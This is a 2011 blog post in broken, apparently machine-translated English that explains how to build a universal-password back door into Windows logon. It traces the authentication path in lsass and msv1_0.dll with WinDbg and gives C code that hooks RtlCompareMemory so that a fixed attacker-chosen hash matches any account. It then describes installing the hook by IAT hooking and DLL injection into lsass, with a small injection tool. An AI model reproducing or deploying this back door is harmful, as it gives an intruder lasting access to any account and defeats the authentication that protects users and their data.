Tuesday, August 23, 2011

Hook Specials 16 : Realize universal password back door of windows with IAT HOOK

Have Windows universal password?

First, We have really whether it can achieve such a back doo.

Course of Windows login gave a brief introduction.

Winlogon is got user name and password with gina.dll, Process of lsass is passed with LPC, Then msv1_0.dll is confirmed and is called by lsass.
And that msv1_0 get user imformations from sam,Include hash of password.

Realize the back door,First find int the bottom of login's confirmation, Then there do some things.

Clearly, The bottom of function is on msv1_0.dll of lsass.

The function is:

LsaApLogonUserEx2 in MSDN

We debug lsass-process ,Then break on msv1_0!LsaApLogonUserEx2.
I use windbg and vmware, Dbgsrv is used on user debug.。

dbgsrv.exe -t tcp:port=1234,password=spat
Then run on debugging client

windbg.exe -premote tcp:server=,port=1234,password=spat
Then attach lsass process.
But there run dbgsrv after login, For that dbgsrv is closed, So when Starting up, Dbgsrv is ran with task scheduler of windows.

After wirtual machine run,Dbgsrv already run, Then windbg join and attach to lsass.
Break msv1_0!LsaApLogonUserEx2, go.
Then log in,really is breoke by windbg.

When the time, Use wt the comamand, It can log all to be called fuctions's relationship .
I write script of python to export wt to treectrl

People notice mouse :ntdll!RtlCompareMemory。

The function is "the bottom of function".

IN SIZE_T Length
RtlCompareMemory in MSDN

Source1 Get password's Unicode md4 hass from sam.
Source2 User input password's Unicode md4 hash.
Length already 16, Because md4 hash is 16 bytes.

Under the function is replace it:

int WINAPI MyRtlCompareMemory(void *a, void *b, int len) {
if (len == 16 && pRtlCompareMemory(PASSWD_HASH, b, len) == 16)
return 16;
return pRtlCompareMemory(a, b, len);

pRtlCompareMemory is gobal variable - real address of RtlCompareMemory, PASSWD_HASH is universal password hash.
Hook RtlCompareMemory use MyRtlCompareMemory to realize preconceted performance.

If compare 16 bytes and second memory is passed because alike our hash.

Hooke function to have many ways, I use simple way - IAT hook+dll inject.
As a result I write a small tool to inject dll:DllInject

C:\Documents and Settings\cly\桌面\bin>InjectDll.exe
InjectDll v0.1
Inject/UnInject a dll file to a process, by cly, at 20080522
InjectDll.exe (-i | -u | -U) pid filename
-i: Inject
-u: UnInject once
-U: UnInject at all

No comments:

Post a Comment